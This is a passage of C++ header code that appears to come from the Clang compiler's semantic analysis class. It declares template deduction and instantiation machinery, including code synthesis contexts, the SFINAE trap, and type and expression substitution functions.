bool DeduceReturnType(FunctionDecl *FD, SourceLocation Loc,
bool Diagnose = true);
/// Declare implicit deduction guides for a class template if we've
/// not already done so.
void DeclareImplicitDeductionGuides(TemplateDecl *Template,
SourceLocation Loc);
QualType DeduceTemplateSpecializationFromInitializer(
TypeSourceInfo *TInfo, const InitializedEntity &Entity,
const InitializationKind &Kind, MultiExprArg Init);
QualType deduceVarTypeFromInitializer(VarDecl *VDecl, DeclarationName Name,
QualType Type, TypeSourceInfo *TSI,
SourceRange Range, bool DirectInit,
Expr *Init);
TypeLoc getReturnTypeLoc(FunctionDecl *FD) const;
bool DeduceFunctionTypeFromReturnExpr(FunctionDecl *FD,
SourceLocation ReturnLoc,
Expr *&RetExpr, AutoType *AT);
FunctionTemplateDecl *getMoreSpecializedTemplate(FunctionTemplateDecl *FT1,
FunctionTemplateDecl *FT2,
SourceLocation Loc,
TemplatePartialOrderingContext TPOC,
unsigned NumCallArguments1,
unsigned NumCallArguments2);
UnresolvedSetIterator
getMostSpecialized(UnresolvedSetIterator SBegin, UnresolvedSetIterator SEnd,
TemplateSpecCandidateSet &FailedCandidates,
SourceLocation Loc,
const PartialDiagnostic &NoneDiag,
const PartialDiagnostic &AmbigDiag,
const PartialDiagnostic &CandidateDiag,
bool Complain = true, QualType TargetType = QualType());
ClassTemplatePartialSpecializationDecl *
getMoreSpecializedPartialSpecialization(
ClassTemplatePartialSpecializationDecl *PS1,
ClassTemplatePartialSpecializationDecl *PS2,
SourceLocation Loc);
bool isMoreSpecializedThanPrimary(ClassTemplatePartialSpecializationDecl *T,
sema::TemplateDeductionInfo &Info);
VarTemplatePartialSpecializationDecl *getMoreSpecializedPartialSpecialization(
VarTemplatePartialSpecializationDecl *PS1,
VarTemplatePartialSpecializationDecl *PS2, SourceLocation Loc);
bool isMoreSpecializedThanPrimary(VarTemplatePartialSpecializationDecl *T,
sema::TemplateDeductionInfo &Info);
bool isTemplateTemplateParameterAtLeastAsSpecializedAs(
TemplateParameterList *P, TemplateDecl *AArg, SourceLocation Loc);
void MarkUsedTemplateParameters(const Expr *E, bool OnlyDeduced,
unsigned Depth, llvm::SmallBitVector &Used);
void MarkUsedTemplateParameters(const TemplateArgumentList &TemplateArgs,
bool OnlyDeduced,
unsigned Depth,
llvm::SmallBitVector &Used);
void MarkDeducedTemplateParameters(
const FunctionTemplateDecl *FunctionTemplate,
llvm::SmallBitVector &Deduced) {
return MarkDeducedTemplateParameters(Context, FunctionTemplate, Deduced);
}
static void MarkDeducedTemplateParameters(ASTContext &Ctx,
const FunctionTemplateDecl *FunctionTemplate,
llvm::SmallBitVector &Deduced);
//===--------------------------------------------------------------------===//
// C++ Template Instantiation
//
MultiLevelTemplateArgumentList
getTemplateInstantiationArgs(NamedDecl *D,
const TemplateArgumentList *Innermost = nullptr,
bool RelativeToPrimary = false,
const FunctionDecl *Pattern = nullptr);
/// A context in which code is being synthesized (where a source location
/// alone is not sufficient to identify the context). This covers template
/// instantiation and various forms of implicitly-generated functions.
struct CodeSynthesisContext {
/// The kind of template instantiation we are performing
enum SynthesisKind {
/// We are instantiating a template declaration. The entity is
/// the declaration we're instantiating (e.g., a CXXRecordDecl).
TemplateInstantiation,
/// We are instantiating a default argument for a template
/// parameter. The Entity is the template parameter whose argument is
/// being instantiated, the Template is the template, and the
/// TemplateArgs/NumTemplateArguments provide the template arguments as
/// specified.
DefaultTemplateArgumentInstantiation,
/// We are instantiating a default argument for a function.
/// The Entity is the ParmVarDecl, and TemplateArgs/NumTemplateArgs
/// provides the template arguments as specified.
DefaultFunctionArgumentInstantiation,
/// We are substituting explicit template arguments provided for
/// a function template. The entity is a FunctionTemplateDecl.
ExplicitTemplateArgumentSubstitution,
/// We are substituting template argument determined as part of
/// template argument deduction for either a class template
/// partial specialization or a function template. The
/// Entity is either a {Class|Var}TemplatePartialSpecializationDecl or
/// a TemplateDecl.
DeducedTemplateArgumentSubstitution,
/// We are substituting prior template arguments into a new
/// template parameter. The template parameter itself is either a
/// NonTypeTemplateParmDecl or a TemplateTemplateParmDecl.
PriorTemplateArgumentSubstitution,
/// We are checking the validity of a default template argument that
/// has been used when naming a template-id.
DefaultTemplateArgumentChecking,
/// We are computing the exception specification for a defaulted special
/// member function.
ExceptionSpecEvaluation,
/// We are instantiating the exception specification for a function
/// template which was deferred until it was needed.
ExceptionSpecInstantiation,
/// We are declaring an implicit special member function.
DeclaringSpecialMember,
/// We are declaring an implicit 'operator==' for a defaulted
/// 'operator<=>'.
DeclaringImplicitEqualityComparison,
/// We are defining a synthesized function (such as a defaulted special
/// member).
DefiningSynthesizedFunction,
// We are checking the constraints associated with a constrained entity or
// the constraint expression of a concept. This includes the checks that
// atomic constraints have the type 'bool' and that they can be constant
// evaluated.
ConstraintsCheck,
// We are substituting template arguments into a constraint expression.
ConstraintSubstitution,
// We are normalizing a constraint expression.
ConstraintNormalization,
// We are substituting into the parameter mapping of an atomic constraint
// during normalization.
ParameterMappingSubstitution,
/// We are rewriting a comparison operator in terms of an operator<=>.
RewritingOperatorAsSpaceship,
/// Added for Template instantiation observation.
/// Memoization means we are _not_ instantiating a template because
/// it is already instantiated (but we entered a context where we
/// would have had to if it was not already instantiated).
Memoization
} Kind;
/// Was the enclosing context a non-instantiation SFINAE context?
bool SavedInNonInstantiationSFINAEContext;
/// The point of instantiation or synthesis within the source code.
SourceLocation PointOfInstantiation;
/// The entity that is being synthesized.
Decl *Entity;
/// The template (or partial specialization) in which we are
/// performing the instantiation, for substitutions of prior template
/// arguments.
NamedDecl *Template;
/// The list of template arguments we are substituting, if they
/// are not part of the entity.
const TemplateArgument *TemplateArgs;
// FIXME: Wrap this union around more members, or perhaps store the
// kind-specific members in the RAII object owning the context.
union {
/// The number of template arguments in TemplateArgs.
unsigned NumTemplateArgs;
/// The special member being declared or defined.
CXXSpecialMember SpecialMember;
};
ArrayRef<TemplateArgument> template_arguments() const {
assert(Kind != DeclaringSpecialMember);
return {TemplateArgs, NumTemplateArgs};
}
/// The template deduction info object associated with the
/// substitution or checking of explicit or deduced template arguments.
sema::TemplateDeductionInfo *DeductionInfo;
/// The source range that covers the construct that cause
/// the instantiation, e.g., the template-id that causes a class
/// template instantiation.
SourceRange InstantiationRange;
CodeSynthesisContext()
: Kind(TemplateInstantiation),
SavedInNonInstantiationSFINAEContext(false), Entity(nullptr),
Template(nullptr), TemplateArgs(nullptr), NumTemplateArgs(0),
DeductionInfo(nullptr) {}
/// Determines whether this template is an actual instantiation
/// that should be counted toward the maximum instantiation depth.
bool isInstantiationRecord() const;
};
/// List of active code synthesis contexts.
///
/// This vector is treated as a stack. As synthesis of one entity requires
/// synthesis of another, additional contexts are pushed onto the stack.
SmallVector<CodeSynthesisContext, 16> CodeSynthesisContexts;
/// Specializations whose definitions are currently being instantiated.
llvm::DenseSet<std::pair<Decl *, unsigned>> InstantiatingSpecializations;
/// Non-dependent types used in templates that have already been instantiated
/// by some template instantiation.
llvm::DenseSet<QualType> InstantiatedNonDependentTypes;
/// Extra modules inspected when performing a lookup during a template
/// instantiation. Computed lazily.
SmallVector<Module*, 16> CodeSynthesisContextLookupModules;
/// Cache of additional modules that should be used for name lookup
/// within the current template instantiation. Computed lazily; use
/// getLookupModules() to get a complete set.
llvm::DenseSet<Module*> LookupModulesCache;
/// Get the set of additional modules that should be checked during
/// name lookup. A module and its imports become visible when instanting a
/// template defined within it.
llvm::DenseSet<Module*> &getLookupModules();
/// Map from the most recent declaration of a namespace to the most
/// recent visible declaration of that namespace.
llvm::DenseMap<NamedDecl*, NamedDecl*> VisibleNamespaceCache;
/// Whether we are in a SFINAE context that is not associated with
/// template instantiation.
///
/// This is used when setting up a SFINAE trap (\c see SFINAETrap) outside
/// of a template instantiation or template argument deduction.
bool InNonInstantiationSFINAEContext;
/// The number of \p CodeSynthesisContexts that are not template
/// instantiations and, therefore, should not be counted as part of the
/// instantiation depth.
///
/// When the instantiation depth reaches the user-configurable limit
/// \p LangOptions::InstantiationDepth we will abort instantiation.
// FIXME: Should we have a similar limit for other forms of synthesis?
unsigned NonInstantiationEntries;
/// The depth of the context stack at the point when the most recent
/// error or warning was produced.
///
/// This value is used to suppress printing of redundant context stacks
/// when there are multiple errors or warnings in the same instantiation.
// FIXME: Does this belong in Sema? It's tough to implement it anywhere else.
unsigned LastEmittedCodeSynthesisContextDepth = 0;
/// The template instantiation callbacks to trace or track
/// instantiations (objects can be chained).
///
/// This callbacks is used to print, trace or track template
/// instantiations as they are being constructed.
std::vector<std::unique_ptr<TemplateInstantiationCallback>>
TemplateInstCallbacks;
/// The current index into pack expansion arguments that will be
/// used for substitution of parameter packs.
///
/// The pack expansion index will be -1 to indicate that parameter packs
/// should be instantiated as themselves. Otherwise, the index specifies
/// which argument within the parameter pack will be used for substitution.
int ArgumentPackSubstitutionIndex;
/// RAII object used to change the argument pack substitution index
/// within a \c Sema object.
///
/// See \c ArgumentPackSubstitutionIndex for more information.
class ArgumentPackSubstitutionIndexRAII {
Sema &Self;
int OldSubstitutionIndex;
public:
ArgumentPackSubstitutionIndexRAII(Sema &Self, int NewSubstitutionIndex)
: Self(Self), OldSubstitutionIndex(Self.ArgumentPackSubstitutionIndex) {
Self.ArgumentPackSubstitutionIndex = NewSubstitutionIndex;
}
~ArgumentPackSubstitutionIndexRAII() {
Self.ArgumentPackSubstitutionIndex = OldSubstitutionIndex;
}
};
friend class ArgumentPackSubstitutionRAII;
/// For each declaration that involved template argument deduction, the
/// set of diagnostics that were suppressed during that template argument
/// deduction.
///
/// FIXME: Serialize this structure to the AST file.
typedef llvm::DenseMap<Decl *, SmallVector<PartialDiagnosticAt, 1> >
SuppressedDiagnosticsMap;
SuppressedDiagnosticsMap SuppressedDiagnostics;
/// A stack object to be created when performing template
/// instantiation.
///
/// Construction of an object of type \c InstantiatingTemplate
/// pushes the current instantiation onto the stack of active
/// instantiations. If the size of this stack exceeds the maximum
/// number of recursive template instantiations, construction
/// produces an error and evaluates true.
///
/// Destruction of this object will pop the named instantiation off
/// the stack.
struct InstantiatingTemplate {
/// Note that we are instantiating a class template,
/// function template, variable template, alias template,
/// or a member thereof.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
Decl *Entity,
SourceRange InstantiationRange = SourceRange());
struct ExceptionSpecification {};
/// Note that we are instantiating an exception specification
/// of a function template.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
FunctionDecl *Entity, ExceptionSpecification,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating a default argument in a
/// template-id.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
TemplateParameter Param, TemplateDecl *Template,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange = SourceRange());
/// Note that we are substituting either explicitly-specified or
/// deduced template arguments during function template argument deduction.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
FunctionTemplateDecl *FunctionTemplate,
ArrayRef<TemplateArgument> TemplateArgs,
CodeSynthesisContext::SynthesisKind Kind,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating as part of template
/// argument deduction for a class template declaration.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
TemplateDecl *Template,
ArrayRef<TemplateArgument> TemplateArgs,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating as part of template
/// argument deduction for a class template partial
/// specialization.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ClassTemplatePartialSpecializationDecl *PartialSpec,
ArrayRef<TemplateArgument> TemplateArgs,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating as part of template
/// argument deduction for a variable template partial
/// specialization.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
VarTemplatePartialSpecializationDecl *PartialSpec,
ArrayRef<TemplateArgument> TemplateArgs,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange = SourceRange());
/// Note that we are instantiating a default argument for a function
/// parameter.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ParmVarDecl *Param,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange = SourceRange());
/// Note that we are substituting prior template arguments into a
/// non-type parameter.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
NamedDecl *Template,
NonTypeTemplateParmDecl *Param,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange);
/// Note that we are substituting prior template arguments into a
/// template template parameter.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
NamedDecl *Template,
TemplateTemplateParmDecl *Param,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange);
/// Note that we are checking the default template argument
/// against the template parameter for a given template-id.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
TemplateDecl *Template,
NamedDecl *Param,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange);
struct ConstraintsCheck {};
/// \brief Note that we are checking the constraints associated with some
/// constrained entity (a concept declaration or a template with associated
/// constraints).
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ConstraintsCheck, NamedDecl *Template,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange InstantiationRange);
struct ConstraintSubstitution {};
/// \brief Note that we are checking a constraint expression associated
/// with a template declaration or as part of the satisfaction check of a
/// concept.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ConstraintSubstitution, NamedDecl *Template,
sema::TemplateDeductionInfo &DeductionInfo,
SourceRange InstantiationRange);
struct ConstraintNormalization {};
/// \brief Note that we are normalizing a constraint expression.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ConstraintNormalization, NamedDecl *Template,
SourceRange InstantiationRange);
struct ParameterMappingSubstitution {};
/// \brief Note that we are subtituting into the parameter mapping of an
/// atomic constraint during constraint normalization.
InstantiatingTemplate(Sema &SemaRef, SourceLocation PointOfInstantiation,
ParameterMappingSubstitution, NamedDecl *Template,
SourceRange InstantiationRange);
/// Note that we have finished instantiating this template.
void Clear();
~InstantiatingTemplate() { Clear(); }
/// Determines whether we have exceeded the maximum
/// recursive template instantiations.
bool isInvalid() const { return Invalid; }
/// Determine whether we are already instantiating this
/// specialization in some surrounding active instantiation.
bool isAlreadyInstantiating() const { return AlreadyInstantiating; }
private:
Sema &SemaRef;
bool Invalid;
bool AlreadyInstantiating;
bool CheckInstantiationDepth(SourceLocation PointOfInstantiation,
SourceRange InstantiationRange);
InstantiatingTemplate(
Sema &SemaRef, CodeSynthesisContext::SynthesisKind Kind,
SourceLocation PointOfInstantiation, SourceRange InstantiationRange,
Decl *Entity, NamedDecl *Template = nullptr,
ArrayRef<TemplateArgument> TemplateArgs = None,
sema::TemplateDeductionInfo *DeductionInfo = nullptr);
InstantiatingTemplate(const InstantiatingTemplate&) = delete;
InstantiatingTemplate&
operator=(const InstantiatingTemplate&) = delete;
};
void pushCodeSynthesisContext(CodeSynthesisContext Ctx);
void popCodeSynthesisContext();
/// Determine whether we are currently performing template instantiation.
bool inTemplateInstantiation() const {
return CodeSynthesisContexts.size() > NonInstantiationEntries;
}
void PrintContextStack() {
if (!CodeSynthesisContexts.empty() &&
CodeSynthesisContexts.size() != LastEmittedCodeSynthesisContextDepth) {
PrintInstantiationStack();
LastEmittedCodeSynthesisContextDepth = CodeSynthesisContexts.size();
}
if (PragmaAttributeCurrentTargetDecl)
PrintPragmaAttributeInstantiationPoint();
}
void PrintInstantiationStack();
void PrintPragmaAttributeInstantiationPoint();
/// Determines whether we are currently in a context where
/// template argument substitution failures are not considered
/// errors.
///
/// \returns An empty \c Optional if we're not in a SFINAE context.
/// Otherwise, contains a pointer that, if non-NULL, contains the nearest
/// template-deduction context object, which can be used to capture
/// diagnostics that will be suppressed.
Optional<sema::TemplateDeductionInfo *> isSFINAEContext() const;
/// Determines whether we are currently in a context that
/// is not evaluated as per C++ [expr] p5.
bool isUnevaluatedContext() const {
assert(!ExprEvalContexts.empty() &&
"Must be in an expression evaluation context");
return ExprEvalContexts.back().isUnevaluated();
}
/// RAII class used to determine whether SFINAE has
/// trapped any errors that occur during template argument
/// deduction.
class SFINAETrap {
Sema &SemaRef;
unsigned PrevSFINAEErrors;
bool PrevInNonInstantiationSFINAEContext;
bool PrevAccessCheckingSFINAE;
bool PrevLastDiagnosticIgnored;
public:
explicit SFINAETrap(Sema &SemaRef, bool AccessCheckingSFINAE = false)
: SemaRef(SemaRef), PrevSFINAEErrors(SemaRef.NumSFINAEErrors),
PrevInNonInstantiationSFINAEContext(
SemaRef.InNonInstantiationSFINAEContext),
PrevAccessCheckingSFINAE(SemaRef.AccessCheckingSFINAE),
PrevLastDiagnosticIgnored(
SemaRef.getDiagnostics().isLastDiagnosticIgnored())
{
if (!SemaRef.isSFINAEContext())
SemaRef.InNonInstantiationSFINAEContext = true;
SemaRef.AccessCheckingSFINAE = AccessCheckingSFINAE;
}
~SFINAETrap() {
SemaRef.NumSFINAEErrors = PrevSFINAEErrors;
SemaRef.InNonInstantiationSFINAEContext
= PrevInNonInstantiationSFINAEContext;
SemaRef.AccessCheckingSFINAE = PrevAccessCheckingSFINAE;
SemaRef.getDiagnostics().setLastDiagnosticIgnored(
PrevLastDiagnosticIgnored);
}
/// Determine whether any SFINAE errors have been trapped.
bool hasErrorOccurred() const {
return SemaRef.NumSFINAEErrors > PrevSFINAEErrors;
}
};
/// RAII class used to indicate that we are performing provisional
/// semantic analysis to determine the validity of a construct, so
/// typo-correction and diagnostics in the immediate context (not within
/// implicitly-instantiated templates) should be suppressed.
class TentativeAnalysisScope {
Sema &SemaRef;
// FIXME: Using a SFINAETrap for this is a hack.
SFINAETrap Trap;
bool PrevDisableTypoCorrection;
public:
explicit TentativeAnalysisScope(Sema &SemaRef)
: SemaRef(SemaRef), Trap(SemaRef, true),
PrevDisableTypoCorrection(SemaRef.DisableTypoCorrection) {
SemaRef.DisableTypoCorrection = true;
}
~TentativeAnalysisScope() {
SemaRef.DisableTypoCorrection = PrevDisableTypoCorrection;
}
};
/// The current instantiation scope used to store local
/// variables.
LocalInstantiationScope *CurrentInstantiationScope;
/// Tracks whether we are in a context where typo correction is
/// disabled.
bool DisableTypoCorrection;
/// The number of typos corrected by CorrectTypo.
unsigned TyposCorrected;
typedef llvm::SmallSet<SourceLocation, 2> SrcLocSet;
typedef llvm::DenseMap<IdentifierInfo *, SrcLocSet> IdentifierSourceLocations;
/// A cache containing identifiers for which typo correction failed and
/// their locations, so that repeated attempts to correct an identifier in a
/// given location are ignored if typo correction already failed for it.
IdentifierSourceLocations TypoCorrectionFailures;
/// Worker object for performing CFG-based warnings.
sema::AnalysisBasedWarnings AnalysisWarnings;
threadSafety::BeforeSet *ThreadSafetyDeclCache;
/// An entity for which implicit template instantiation is required.
///
/// The source location associated with the declaration is the first place in
/// the source code where the declaration was "used". It is not necessarily
/// the point of instantiation (which will be either before or after the
/// namespace-scope declaration that triggered this implicit instantiation),
/// However, it is the location that diagnostics should generally refer to,
/// because users will need to know what code triggered the instantiation.
typedef std::pair<ValueDecl *, SourceLocation> PendingImplicitInstantiation;
/// The queue of implicit template instantiations that are required
/// but have not yet been performed.
std::deque<PendingImplicitInstantiation> PendingInstantiations;
/// Queue of implicit template instantiations that cannot be performed
/// eagerly.
SmallVector<PendingImplicitInstantiation, 1> LateParsedInstantiations;
class GlobalEagerInstantiationScope {
public:
GlobalEagerInstantiationScope(Sema &S, bool Enabled)
: S(S), Enabled(Enabled) {
if (!Enabled) return;
SavedPendingInstantiations.swap(S.PendingInstantiations);
SavedVTableUses.swap(S.VTableUses);
}
void perform() {
if (Enabled) {
S.DefineUsedVTables();
S.PerformPendingInstantiations();
}
}
~GlobalEagerInstantiationScope() {
if (!Enabled) return;
// Restore the set of pending vtables.
assert(S.VTableUses.empty() &&
"VTableUses should be empty before it is discarded.");
S.VTableUses.swap(SavedVTableUses);
// Restore the set of pending implicit instantiations.
assert(S.PendingInstantiations.empty() &&
"PendingInstantiations should be empty before it is discarded.");
S.PendingInstantiations.swap(SavedPendingInstantiations);
}
private:
Sema &S;
SmallVector<VTableUse, 16> SavedVTableUses;
std::deque<PendingImplicitInstantiation> SavedPendingInstantiations;
bool Enabled;
};
/// The queue of implicit template instantiations that are required
/// and must be performed within the current local scope.
///
/// This queue is only used for member functions of local classes in
/// templates, which must be instantiated in the same scope as their
/// enclosing function, so that they can reference function-local
/// types, static variables, enumerators, etc.
std::deque<PendingImplicitInstantiation> PendingLocalImplicitInstantiations;
class LocalEagerInstantiationScope {
public:
LocalEagerInstantiationScope(Sema &S) : S(S) {
SavedPendingLocalImplicitInstantiations.swap(
S.PendingLocalImplicitInstantiations);
}
void perform() { S.PerformPendingInstantiations(/*LocalOnly=*/true); }
~LocalEagerInstantiationScope() {
assert(S.PendingLocalImplicitInstantiations.empty() &&
"there shouldn't be any pending local implicit instantiations");
SavedPendingLocalImplicitInstantiations.swap(
S.PendingLocalImplicitInstantiations);
}
private:
Sema &S;
std::deque<PendingImplicitInstantiation>
SavedPendingLocalImplicitInstantiations;
};
/// A helper class for building up ExtParameterInfos.
class ExtParameterInfoBuilder {
SmallVector<FunctionProtoType::ExtParameterInfo, 16> Infos;
bool HasInteresting = false;
public:
/// Set the ExtParameterInfo for the parameter at the given index,
///
void set(unsigned index, FunctionProtoType::ExtParameterInfo info) {
assert(Infos.size() <= index);
Infos.resize(index);
Infos.push_back(info);
if (!HasInteresting)
HasInteresting = (info != FunctionProtoType::ExtParameterInfo());
}
/// Return a pointer (suitable for setting in an ExtProtoInfo) to the
/// ExtParameterInfo array we've built up.
const FunctionProtoType::ExtParameterInfo *
getPointerOrNull(unsigned numParams) {
if (!HasInteresting) return nullptr;
Infos.resize(numParams);
return Infos.data();
}
};
void PerformPendingInstantiations(bool LocalOnly = false);
TypeSourceInfo *SubstType(TypeSourceInfo *T,
const MultiLevelTemplateArgumentList &TemplateArgs,
SourceLocation Loc, DeclarationName Entity,
bool AllowDeducedTST = false);
QualType SubstType(QualType T,
const MultiLevelTemplateArgumentList &TemplateArgs,
SourceLocation Loc, DeclarationName Entity);
TypeSourceInfo *SubstType(TypeLoc TL,
const MultiLevelTemplateArgumentList &TemplateArgs,
SourceLocation Loc, DeclarationName Entity);
TypeSourceInfo *SubstFunctionDeclType(TypeSourceInfo *T,
const MultiLevelTemplateArgumentList &TemplateArgs,
SourceLocation Loc,
DeclarationName Entity,
CXXRecordDecl *ThisContext,
Qualifiers ThisTypeQuals);
void SubstExceptionSpec(FunctionDecl *New, const FunctionProtoType *Proto,
const MultiLevelTemplateArgumentList &Args);
bool SubstExceptionSpec(SourceLocation Loc,
FunctionProtoType::ExceptionSpecInfo &ESI,
SmallVectorImpl<QualType> &ExceptionStorage,
const MultiLevelTemplateArgumentList &Args);
ParmVarDecl *SubstParmVarDecl(ParmVarDecl *D,
const MultiLevelTemplateArgumentList &TemplateArgs,
int indexAdjustment,
Optional<unsigned> NumExpansions,
bool ExpectParameterPack);
bool SubstParmTypes(SourceLocation Loc, ArrayRef<ParmVarDecl *> Params,
const FunctionProtoType::ExtParameterInfo *ExtParamInfos,
const MultiLevelTemplateArgumentList &TemplateArgs,
SmallVectorImpl<QualType> &ParamTypes,
SmallVectorImpl<ParmVarDecl *> *OutParams,
ExtParameterInfoBuilder &ParamInfos);
ExprResult SubstExpr(Expr *E,
const MultiLevelTemplateArgumentList &TemplateArgs);
/// Substitute the given template arguments into a list of
/// expressions, expanding pack expansions if required.
///
/// \param Exprs The list of expressions to substitute into.
///
/// \param IsCall Whether this is some form of call, in which case
/// default arguments will be dropped.
///
/// \param TemplateArgs The set of template arguments to substitute.
///
/// \param Outputs Will receive all of the substituted arguments.
///
/// \returns true if an error occurred, false otherwise.
bool SubstExprs(ArrayRef<Expr *> Exprs, bool IsCall,
const MultiLevelTemplateArgumentList &TemplateArgs,
SmallVectorImpl<Expr *> &Outputs);
StmtResult SubstStmt(Stmt *S,
const MultiLevelTemplateArgumentList &TemplateArgs);
TemplateParameterList *
SubstTemplateParams(TemplateParameterList *Params, DeclContext *Owner,
const MultiLevelTemplateArgumentList &TemplateArgs);
bool
SubstTemplateArguments(ArrayRef<TemplateArgumentLoc> Args,
const MultiLevelTemplateArgumentList &TemplateArgs,
TemplateArgumentListInfo &Outputs);
Decl *SubstDecl(Decl *D, DeclContext *Owner,
const MultiLevelTemplateArgumentList &TemplateArgs);
/// Substitute the name and return type of a defaulted 'operator<=>' to form
/// an implicit 'operator=='.
FunctionDecl *SubstSpaceshipAsEqualEqual(CXXRecordDecl *RD,
FunctionDecl *Spaceship);
ExprResult SubstInitializer(Expr *E,
const MultiLevelTemplateArgumentList &TemplateArgs,
bool CXXDirectInit);
bool
SubstBaseSpecifiers(CXXRecordDecl *Instantiation,
CXXRecordDecl *Pattern,
const MultiLevelTemplateArgumentList &TemplateArgs);
bool
InstantiateClass(SourceLocation PointOfInstantiation,
CXXRecordDecl *Instantiation, CXXRecordDecl *Pattern,
const MultiLevelTemplateArgumentList &TemplateArgs,
TemplateSpecializationKind TSK,
bool Complain = true);
bool InstantiateEnum(SourceLocation PointOfInstantiation,
EnumDecl *Instantiation, EnumDecl *Pattern,
const MultiLevelTemplateArgumentList &TemplateArgs,
TemplateSpecializationKind TSK);
bool InstantiateInClassInitializer(
SourceLocation PointOfInstantiation, FieldDecl *Instantiation,
FieldDecl *Pattern, const MultiLevelTemplateArgumentList &TemplateArgs);
struct LateInstantiatedAttribute {
const Attr *TmplAttr;
LocalInstantiationScope *Scope;
Decl *NewDecl;
LateInstantiatedAttribute(const Attr *A, LocalInstantiationScope *S,
Decl *D)
: TmplAttr(A), Scope(S), NewDecl(D)
{ }
};
typedef SmallVector<LateInstantiatedAttribute, 16> LateInstantiatedAttrVec;
void InstantiateAttrs(const MultiLevelTemplateArgumentList &TemplateArgs,
const Decl *Pattern, Decl *Inst,
LateInstantiatedAttrVec *LateAttrs = nullptr,
LocalInstantiationScope *OuterMostScope = nullptr);
void
InstantiateAttrsForDecl(const MultiLevelTemplateArgumentList &TemplateArgs,
const Decl *Pattern, Decl *Inst,
LateInstantiatedAttrVec *LateAttrs = nullptr,
LocalInstantiationScope *OuterMostScope = nullptr);
bool usesPartialOrExplicitSpecialization(
SourceLocation Loc, ClassTemplateSpecializationDecl *ClassTemplateSpec);
bool
InstantiateClassTemplateSpecialization(SourceLocation PointOfInstantiation,
ClassTemplateSpecializationDecl *ClassTemplateSpec,
TemplateSpecializationKind TSK,
bool Complain = true);
void InstantiateClassMembers(SourceLocation PointOfInstantiation,
CXXRecordDecl *Instantiation,
const MultiLevelTemplateArgumentList &TemplateArgs,
TemplateSpecializationKind TSK);
void InstantiateClassTemplateSpecializationMembers(
SourceLocation PointOfInstantiation,
ClassTemplateSpecializationDecl *ClassTemplateSpec,
TemplateSpecializationKind TSK);
NestedNameSpecifierLoc
SubstNestedNameSpecifierLoc(NestedNameSpecifierLoc NNS,
const MultiLevelTemplateArgumentList &TemplateArgs);
DeclarationNameInfo
SubstDeclarationNameInfo(const DeclarationNameInfo &NameInfo,
const MultiLevelTemplateArgumentList &TemplateArgs);
TemplateName
SubstTemplateName(NestedNameSpecifierLoc QualifierLoc, TemplateName Name,
SourceLocation Loc,
const MultiLevelTemplateArgumentList &TemplateArgs);
bool Subst(const TemplateArgumentLoc *Args, unsigned NumArgs,
TemplateArgumentListInfo &Result,
const MultiLevelTemplateArgumentList &TemplateArgs);
void InstantiateExceptionSpec(SourceLocation PointOfInstantiation,
FunctionDecl *Function);
FunctionDecl *InstantiateFunctionDeclaration(FunctionTemplateDecl *FTD,
const TemplateArgumentList *Args,
SourceLocation Loc);
void InstantiateFunctionDefinition(SourceLocation PointOfInstantiation,
FunctionDecl *Function,
bool Recursive = false,
bool DefinitionRequired = false,
bool AtEndOfTU = false);
VarTemplateSpecializationDecl *BuildVarTemplateInstantiation(
VarTemplateDecl *VarTemplate, VarDecl *FromVar,
const TemplateArgumentList &TemplateArgList,
const TemplateArgumentListInfo &TemplateArgsInfo,
SmallVectorImpl<TemplateArgument> &Converted,
SourceLocation PointOfInstantiation, void *InsertPos,
LateInstantiatedAttrVec *LateAttrs = nullptr,
LocalInstantiationScope *StartingScope = nullptr);
VarTemplateSpecializationDecl *CompleteVarTemplateSpecializationDecl(
VarTemplateSpecializationDecl *VarSpec, VarDecl *PatternDecl,
const MultiLevelTemplateArgumentList &TemplateArgs);
void
BuildVariableInstantiation(VarDecl *NewVar, VarDecl *OldVar,
const MultiLevelTemplateArgumentList &TemplateArgs,
LateInstantiatedAttrVec *LateAttrs,
DeclContext *Owner,
LocalInstantiationScope *StartingScope,
bool InstantiatingVarTemplate = false,
VarTemplateSpecializationDecl *PrevVTSD = nullptr);
VarDecl *getVarTemplateSpecialization(
VarTemplateDecl *VarTempl, const TemplateArgumentListInfo *TemplateArgs,
const DeclarationNameInfo &MemberNameInfo, SourceLocation TemplateKWLoc);
void InstantiateVariableInitializer(
VarDecl *Var, VarDecl *OldVar,
const MultiLevelTemplateArgumentList &TemplateArgs);
void InstantiateVariableDefinition(SourceLocation PointOfInstantiation,
VarDecl *Var, bool Recursive = false,
bool DefinitionRequired = false,
bool AtEndOfTU = false);
void InstantiateMemInitializers(CXXConstructorDecl *New,
const CXXConstructorDecl *Tmpl,
const MultiLevelTemplateArgumentList &TemplateArgs);
NamedDecl *FindInstantiatedDecl(SourceLocation Loc, NamedDecl *D,
const MultiLevelTemplateArgumentList &TemplateArgs,
